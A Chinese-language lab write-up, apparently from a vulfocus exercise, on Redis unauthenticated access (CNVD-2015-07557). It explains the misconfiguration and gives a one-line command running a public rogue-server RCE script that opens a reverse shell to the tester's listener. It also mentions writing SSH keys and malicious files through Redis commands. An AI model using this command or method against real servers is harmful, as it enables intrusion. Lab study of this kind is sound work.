当前位置: 首页 > web >正文

vulfocus漏洞学习——redis 未授权访问 (CNVD-2015-07557)

目录

一、漏洞介绍

二、影响版本

三、漏洞复现

1.使用脚本

四、漏洞原理


一、漏洞介绍

Redis 是一个免费开源的键值存储数据库,数据默认存到内存中,用简单的 C 语言编写,能通过网络访问。该漏洞的成因是:在默认情况下,Redis会绑定到 0.0.0.0:6379,这意味着Redis会直接暴露到公网上,而此时如果又没有设置密码认证,会导致任意用户在可以访问到目标服务器的情况下未授权访问Redis并读取Redis的数据,还可以利用Redis提供的命令将自己的ssh公钥写入目标服务器,从而导致可以直接进行ssh登录目标服务器。

二、影响版本

明确受影响版本 Redis<=5.0.5

但由于是配置不当导致的漏洞,所以高版本如果配置不当也可能导致

三、漏洞复现

1.使用脚本

使用github上一键利用的脚本:GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

python3 redis-rogue-server.py --rhost 192.168.57.143 --rport 40585 --lhost 192.168.57.128 

 这里选择反弹shell,用kali进行监听

成功得到flag

看到还有用写入ssh公钥的,但可能由于我们是docker环境,配置起来稍微要麻烦些,并且尝试了也没有成功。如果是直接部署在虚拟机中的应该会成功。

四、漏洞原理

(1)Redis 默认配置不启用密码认证,且默认监听0.0.0.0:6379,允许任意IP连接。所以我们可以直接通过redis-cli工具无密码连接到redis服务;

(2)同时,Redis提供config等敏感命令,攻击者可以通过这些命令写入恶意文件


http://www.xdnf.cn/news/7375.html

相关文章:

  • CSS提高性能的方法有哪些
  • @RequestParam 和 @RequestBody、HttpServletrequest 与HttpServletResponse
  • 解析:新能源汽车芯片主要玩家及技术发展
  • 从秒开到丝滑体验!WebAssembly助力ZKmall商城重构 B2B2C 商城性能基线
  • 四:操作系统cpu调度之调度算法
  • PyQt5绘图全攻略:QPainter、QPen、QBrush与QPixmap详解
  • uniapp运行到微信开发者工具报错“更改appid失败touristappidError:tourist appid”
  • Spring Bean 生命周期中设计模式的应用与解析
  • 通过vcpkg交叉编译grpc:构建Arm64平台的Docker化开发环境
  • 掌握Git:版本控制与高效协作指南
  • 【C++】哈希的概念与实现
  • 命令行登录 MySQL 报 Segmentation fault 故障解决
  • 代购商城系统可以解决哪些重点难题?
  • 前端 vue + element-ui 框架从 0 - 1 搭建
  • React组件开发流程-03.1
  • go 数据类型转换
  • 5个yyds的.Net商城开源项目
  • [特殊字符] Word2Vec:将词映射到高维空间,它到底能解决什么问题?
  • 【Spring Boot 整合 MongoDB 完整指南】
  • sentinel核心原理-高频问题
  • Android设备 显示充电速度流程
  • 使用 Terraform 创建 Azure Databricks
  • Milvus 从 v2.4.12 升级到 v2.5.11 的实施方案
  • 基于Qt的app开发第九天
  • disryptor和rabbitmq
  • 【notes】VScode 使用总结
  • 数据仓库面试题合集②】ETL 设计与调度策略详解
  • MYSQL故障排查和环境优化
  • kotlin flow的写法
  • 【Pandas】pandas DataFrame pct_change